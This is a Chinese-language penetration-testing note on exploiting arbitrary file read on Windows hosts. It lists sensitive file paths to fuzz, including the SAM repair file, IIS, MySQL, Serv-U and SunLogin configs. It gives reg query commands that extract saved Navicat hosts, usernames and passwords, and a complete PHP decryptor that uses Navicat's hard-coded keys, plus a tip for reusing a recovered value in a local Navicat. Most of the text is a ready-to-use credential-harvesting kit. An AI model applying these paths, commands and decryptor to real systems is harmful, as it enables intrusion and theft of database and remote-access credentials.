任意文件读取漏洞-windows敏感文件路径字典fuzz



 

一般情况下,先读取 IIS 配置文件获取站点路径,然后再读取对应目录下的 web.config。
 

windows也有索引文件位置:

C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb

%LOCALAPPDATA%\Everything\Everything.db
C:\apache\conf\httpd.conf
c:\boot.ini
c:\mysql\data\mysql\user.MYD
c:\Program Files\ Serv-U\ServUAdmin.exe
c:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\mysql\data\mysql\user.MYD
C:\Program Files\mysql\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
c:\Program Files\Serv-U\ServUDaemon.ini
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb
C:\ProgramData\Oray\SunloginClient\config.ini
C:\ProgramData\Oray\SunloginClient\sys_config.ini
C:\ProgramData\Oray\SunloginClientLite\config.ini
c:\Resin\conf\resin.conf \usr\local\resin\conf\resin.conf
c:\Resin-3.0.14\conf\resin.conf
c:\windows\my.ini
c:\windows\php.ini
C:\windows\repair\sam
C:\WINDOWS\system32\inetsrv\MetaBase.xml
C:\WINDOWS\system32\inetstr\config\applicationHost.config
c:\winnt\my.ini
c:\winnt\php.ini
C:\WINNT\system32\inetsrv\MetaBase.bin
d:\APACHE\Apache2\conf\httpd.conf

通过命令行读取 Navicat 保存的连接配置信息:

MySQL-->:HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers
MariaDB-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers
MicrosoftSQL-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers 
Oracle-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers
PostgreSQL-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers
SQLite-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v port

可以解密:

代码在线运行 - 在线工具

<?php
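/**
 * Encodes and decodes the password format Navicat uses for saved connections.
 *
 * Two formats are handled, selected by the constructor argument:
 *  - 11: Blowfish (single-block BF-ECB calls) with a hand-rolled chaining mode;
 *        the key is the SHA-1 digest of a fixed string.
 *  - 12: AES-128-CBC with a fixed key and a fixed IV.
 *
 * Security note: every key and IV used here is a constant hard-coded in this
 * class, so the stored value is obfuscation rather than encryption. No secret
 * is needed to reverse it; when auditing a host, treat saved Navicat password
 * values as plaintext credentials and rotate them after any exposure.
 */
class NavicatPassword
{
    // Format selector (11 or 12). Any other value makes encrypt()/decrypt() return false.
    protected $version = 0;
    // Fixed AES-128 key and IV used by the version-12 format.
    protected $aesKey = 'libcckeylibcckey';
    protected $aesIv = 'libcciv libcciv ';
    // Seed string whose SHA-1 digest becomes the Blowfish key (version-11 format).
    protected $blowString = '3DC5CA39';
    protected $blowKey = null;
    protected $blowIv = null;

    /**
     * @param int $version Format to use: 11 or 12 (default 12).
     */
    public function __construct($version = 12)
    {
        $this->version = $version;
        // Derive the key from the property instead of repeating the literal,
        // so the seed is defined in exactly one place.
        $this->blowKey = sha1($this->blowString, true);
        $this->blowIv = hex2bin('d9c7c3c8870d64bd');
    }

    /**
     * Encode a plaintext password in the configured format.
     *
     * @param string $string Plaintext.
     * @return string|false Upper-case hex string, or false for an unsupported
     *                      version or when the cipher call fails.
     */
    public function encrypt($string)
    {
        $result = false;
        switch ($this->version) {
            case 11:
                $result = $this->encryptEleven($string);
                break;
            case 12:
                $result = $this->encryptTwelve($string);
                break;
            default:
                break;
        }

        return $result;
    }

    /**
     * Version-11 encoding: 8-byte blocks chained through a running vector,
     * with a shorter trailing block XORed against an encrypted vector.
     *
     * @param string $string Plaintext.
     * @return string|false Upper-case hex, or false if a Blowfish call fails.
     */
    protected function encryptEleven($string)
    {
        $fullBlocks = intval(floor(strlen($string) / 8));
        $tailLength = strlen($string) % 8;
        $cipher = '';
        $vector = $this->blowIv;

        for ($i = 0; $i < $fullBlocks; $i++) {
            $block = $this->encryptBlock($this->xorBytes(substr($string, 8 * $i, 8), $vector));
            if ($block === false) {
                // openssl_encrypt() failed; stop instead of XORing against a
                // non-string value and returning corrupt output.
                return false;
            }
            $vector = $this->xorBytes($vector, $block);
            $cipher .= $block;
        }

        if ($tailLength) {
            // $i now equals $fullBlocks, so 8 * $i is the offset of the tail.
            $vector = $this->encryptBlock($vector);
            if ($vector === false) {
                return false;
            }
            $cipher .= $this->xorBytes(substr($string, 8 * $i, $tailLength), $vector);
        }

        return strtoupper(bin2hex($cipher));
    }

    /**
     * Encrypt one block with BF-ECB, raw output, no padding.
     *
     * @param string $block
     * @return string|false Result of openssl_encrypt().
     */
    protected function encryptBlock($block)
    {
        return openssl_encrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);
    }

    /**
     * Decrypt one block with BF-ECB, raw input, no padding.
     *
     * @param string $block
     * @return string|false Result of openssl_decrypt().
     */
    protected function decryptBlock($block)
    {
        return openssl_decrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);
    }

    /**
     * Byte-wise XOR of two strings over the length of the first.
     *
     * $str2 must be at least as long as $str1; every call in this class passes
     * an 8-byte vector as $str2 and at most 8 bytes as $str1.
     *
     * @param string $str1
     * @param string $str2
     * @return string
     */
    protected function xorBytes($str1, $str2)
    {
        $length = strlen($str1);
        $out = '';
        for ($i = 0; $i < $length; $i++) {
            $out .= chr(ord($str1[$i]) ^ ord($str2[$i]));
        }

        return $out;
    }

    /**
     * Version-12 encoding: AES-128-CBC with the fixed key and IV.
     *
     * @param string $string Plaintext.
     * @return string Upper-case hex of the ciphertext.
     */
    protected function encryptTwelve($string)
    {
        $result = openssl_encrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
        return strtoupper(bin2hex($result));
    }

    /**
     * Decode a stored value in the configured format.
     *
     * @param string $string Hex string (either case).
     * @return string|false Plaintext, or false for an unsupported version,
     *                      input that is not valid hex, or a failed cipher call.
     */
    public function decrypt($string)
    {
        $result = false;
        switch ($this->version) {
            case 11:
                $result = $this->decryptEleven($string);
                break;
            case 12:
                $result = $this->decryptTwelve($string);
                break;
            default:
                break;
        }

        return $result;
    }

    /**
     * Reverse of encryptEleven().
     *
     * @param string $upperString Hex string.
     * @return string|false Plaintext, or false on malformed hex / cipher failure.
     */
    protected function decryptEleven($upperString)
    {
        $bytes = $this->hexToBytes($upperString);
        if ($bytes === false) {
            return false;
        }

        $fullBlocks = intval(floor(strlen($bytes) / 8));
        $tailLength = strlen($bytes) % 8;
        $plain = '';
        $vector = $this->blowIv;

        for ($i = 0; $i < $fullBlocks; $i++) {
            $encryptedBlock = substr($bytes, 8 * $i, 8);
            $decryptedBlock = $this->decryptBlock($encryptedBlock);
            if ($decryptedBlock === false) {
                return false;
            }
            $plain .= $this->xorBytes($decryptedBlock, $vector);
            $vector = $this->xorBytes($vector, $encryptedBlock);
        }

        if ($tailLength) {
            // The tail is XORed with an *encrypted* vector in both directions.
            $vector = $this->encryptBlock($vector);
            if ($vector === false) {
                return false;
            }
            $plain .= $this->xorBytes(substr($bytes, 8 * $i, $tailLength), $vector);
        }

        return $plain;
    }

    /**
     * Reverse of encryptTwelve().
     *
     * @param string $upperString Hex string.
     * @return string|false Plaintext, or false on malformed hex / failed decryption.
     */
    protected function decryptTwelve($upperString)
    {
        $bytes = $this->hexToBytes($upperString);
        if ($bytes === false) {
            return false;
        }

        return openssl_decrypt($bytes, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
    }

    /**
     * Convert a hex string to raw bytes, rejecting anything hex2bin() would
     * only warn about (non-hex characters, odd length, non-string input).
     *
     * @param mixed $hex
     * @return string|false Raw bytes ('' for an empty string), or false when invalid.
     */
    private function hexToBytes($hex)
    {
        if ($hex === '') {
            return '';
        }
        if (!is_string($hex) || strlen($hex) % 2 !== 0 || !ctype_xdigit($hex)) {
            return false;
        }

        return hex2bin($hex);
    }
}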
 
 
// The format version must be given explicitly; two are supported: 11 or 12.
// $navicatPassword = new NavicatPassword(12);
$navicatPassword = new NavicatPassword(11);

// Decode one stored value. The literal passed below is a placeholder for the
// stored hex string, e.g. $navicatPassword->decrypt('15057D7BA390');
$decode = sprintf('%s%s', "密码:", $navicatPassword->decrypt('获取到的密码'));
echo $decode, "\n";
?>

https://www.nhooo.com/tool/java/

也可以在本地 Navicat 中随便新建一个连接,然后用记事本替换其中加密项的值,再直接连接(连不上时换个版本再操作)。
